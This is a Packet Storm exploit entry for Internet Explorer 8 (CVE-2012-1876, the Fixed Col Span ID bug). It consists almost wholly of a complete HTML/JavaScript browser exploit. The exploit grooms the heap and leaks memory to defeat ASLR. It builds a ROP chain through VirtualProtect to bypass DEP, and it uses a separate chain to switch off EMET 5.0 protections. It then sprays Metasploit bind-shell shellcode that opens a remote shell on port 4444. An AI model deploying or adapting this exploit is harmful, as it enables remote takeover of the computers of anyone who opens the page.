Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypass

2014-09-29T00:00:00
ID PACKETSTORM:128476
Type packetstorm
Reporter sickness
Modified 2014-09-29T00:00:00

Description

                                        
                                            `<!--  
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass  
** Exploit Coded by sickness || EMET 5.0 bypass by ryujin  
** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ ‎  
** Affected Software: Internet Explorer 8  
** Vulnerability: Fixed Col Span ID  
** CVE: CVE-2012-1876  
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0  
-->  
  
<html>  
<body>  
<div id="evil"></div>  
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>  
<script language='javascript'>  
  
function strtoint(str) {  
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);  
}  
  
var free = "EEEE";  
while ( free.length < 500 ) free += free;  
  
var string1 = "AAAA";  
while ( string1.length < 500 ) string1 += string1;  
  
var string2 = "BBBB";  
while ( string2.length < 500 ) string2 += string2;  
  
var fr = new Array();  
var al = new Array();  
var bl = new Array();  
  
var div_container = document.getElementById("evil");  
div_container.style.cssText = "display:none";  
  
for (var i=0; i < 500; i+=2) {  
fr[i] = free.substring(0, (0x100-6)/2);  
al[i] = string1.substring(0, (0x100-6)/2);  
bl[i] = string2.substring(0, (0x100-6)/2);  
var obj = document.createElement("button");  
div_container.appendChild(obj);  
}  
  
for (var i=200; i<500; i+=2 ) {  
fr[i] = null;  
CollectGarbage();  
}  
  
function heapspray(cbuttonlayout) {  
CollectGarbage();  
var rop = cbuttonlayout + 4161; // RET  
var rop = rop.toString(16);  
var rop1 = rop.substring(4,8);  
var rop2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 11360; // POP EBP  
var rop = rop.toString(16);  
var rop3 = rop.substring(4,8);  
var rop4 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP  
var rop = rop.toString(16);  
var rop5 = rop.substring(4,8);  
var rop6 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12377; // POP EBX  
var rop = rop.toString(16);  
var rop7 = rop.substring(4,8);  
var rop8 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 642768; // POP EDX  
var rop = rop.toString(16);  
var rop9 = rop.substring(4,8);  
var rop10 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12201; // POP ECX --> Changed  
var rop = rop.toString(16);  
var rop11 = rop.substring(4,8);  
var rop12 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 5504544; // Writable location  
var rop = rop.toString(16);  
var writable1 = rop.substring(4,8);  
var writable2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12462; // POP EDI  
var rop = rop.toString(16);  
var rop13 = rop.substring(4,8);  
var rop14 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12043; // POP ESI --> changed  
var rop = rop.toString(16);  
var rop15 = rop.substring(4,8);  
var rop16 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 63776; // JMP EAX  
var rop = rop.toString(16);  
var jmpeax1 = rop.substring(4,8);  
var jmpeax2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 85751; // POP EAX  
var rop = rop.toString(16);  
var rop17 = rop.substring(4,8);  
var rop18 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 4936; // VirtualProtect()  
var rop = rop.toString(16);  
var vp1 = rop.substring(4,8);  
var vp2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]  
var rop = rop.toString(16);  
var rop19 = rop.substring(4,8);  
var rop20 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 234657; // PUSHAD  
var rop = rop.toString(16);  
var rop21 = rop.substring(4,8);  
var rop22 = rop.substring(0,4); // } RET  
  
  
var rop = cbuttonlayout + 408958; // PUSH ESP  
var rop = rop.toString(16);  
var rop23 = rop.substring(4,8);  
var rop24 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2228408; // POP ECX  
var rop = rop.toString(16);  
var rop25 = rop.substring(4,8);  
var rop26 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1586172; // POP EAX  
var rop = rop.toString(16);  
var rop27 = rop.substring(4,8);  
var rop28 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]  
var rop = rop.toString(16);  
var rop29 = rop.substring(4,8);  
var rop30 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1884912; // PUSH EAX  
var rop = rop.toString(16);  
var rop31 = rop.substring(4,8);  
var rop32 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX  
var rop = rop.toString(16);  
var rop33 = rop.substring(4,8);  
var rop34 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX  
var rop = rop.toString(16);  
var rop35 = rop.substring(4,8);  
var rop36 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 5036248; // ADD ESP,0C  
var rop = rop.toString(16);  
var rop37 = rop.substring(4,8);  
var rop38 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX  
var rop = rop.toString(16);  
var rop39 = rop.substring(4,8);  
var rop40 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI  
var rop = rop.toString(16);  
var rop41 = rop.substring(4,8);  
var rop42 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX  
var rop = rop.toString(16);  
var rop43 = rop.substring(4,8);  
var rop44 = rop.substring(0,4); // } RET  
  
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW  
var getmodulew = getmodulew.toString(16);  
var getmodulew1 = getmodulew.substring(4,8);  
var getmodulew2 = getmodulew.substring(0,4); // } RET  
  
  
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING  
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING  
shellcode+= unescape("%u4141%u4141"); // PADDING  
  
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN  
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN  
  
// EMET disable part 0x01  
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.  
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN  
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr  
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN  
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)  
shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN  
shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)  
shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u0558%u0000"); // ROP Protections offset  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u0000%u0000"); // NULL  
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN  
// EMET disable part 0x01 end  
  
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP  
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP  
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024  
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX  
shellcode+= unescape("%u0040%u0000"); // 0x00000040  
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX  
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location  
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI  
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX  
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX  
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD  
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP  
  
// Store various pointers here  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u14eb"); // NOPs  
shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer  
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*  
shellcode+= "EMET"; // EMET string  
shellcode+= unescape("%u0000%u0000"); // EMET string  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u9090"); // NOPs  
// Store various pointers here  
  
// EMET disable part 0x02  
// MOV EAX,DWORD PTR DS:[076D10BCH]  
// MOV ESI,DWORD PTR [EAX+518H]  
// SUB ESP,2CCH  
// MOV DWORD PTR [ESP],10010H  
// MOV EDI,ESP  
// MOV ECX,2CCH  
// ADD EDI,4  
// SUB ECX,4  
// XOR EAX,EAX  
// REP STOS BYTE PTR ES:[EDI]  
// PUSH ESP  
// PUSH 0FFFFFFFEH  
// CALL ESI  
shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +  
"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +  
"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +  
"%ufe6a%ud6ff");  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u9090"); // NOPs  
// EMET disable part 0x02 end  
  
// Bind shellcode on 4444 :)  
// msf > generate -t js_le  
// windows/shell_bind_tcp - 342 bytes  
// http://www.metasploit.com  
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,  
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=  
// I would keep the shellcode the same size for better reliability :)  
  
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +  
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +  
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +  
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +  
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +  
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +  
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +  
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +  
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +  
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +  
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +  
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +  
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +  
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +  
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +  
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +  
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +  
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +  
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +  
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +  
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +  
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +  
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +  
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +  
"%u006a%uff53%u41d5");  
  
// Total spray should be 1000  
var padding = unescape("%u9090");  
while (padding.length < 1000)  
padding = padding + padding;  
var padding = padding.substr(0, 1000 - shellcode.length);  
  
shellcode+= padding;  
  
while (shellcode.length < 100000)  
shellcode = shellcode + shellcode;  
  
var onemeg = shellcode.substr(0, 64*1024/2);  
  
for (i=0; i<14; i++) {  
onemeg += shellcode.substr(0, 64*1024/2);  
}  
  
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));  
  
var spray = new Array();  
  
for (i=0; i<100; i++) {  
spray[i] = onemeg.substr(0, onemeg.length);  
}  
}  
  
function leak(){  
var leak_col = document.getElementById("132");  
leak_col.width = "41";  
leak_col.span = "19";  
}  
  
function get_leak() {  
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));  
str_addr = str_addr - 1410704;  
var hex = str_addr.toString(16);  
//alert(hex);  
setTimeout(function(){heapspray(str_addr)}, 50);  
}  
  
function trigger_overflow(){  
var evil_col = document.getElementById("132");  
evil_col.width = "1245880";  
evil_col.span = "44";  
}  
  
setTimeout(function(){leak()}, 400);  
setTimeout(function(){get_leak()},450);  
setTimeout(function(){trigger_overflow()}, 700);  
  
</script>  
</body>  
</html>  
  
`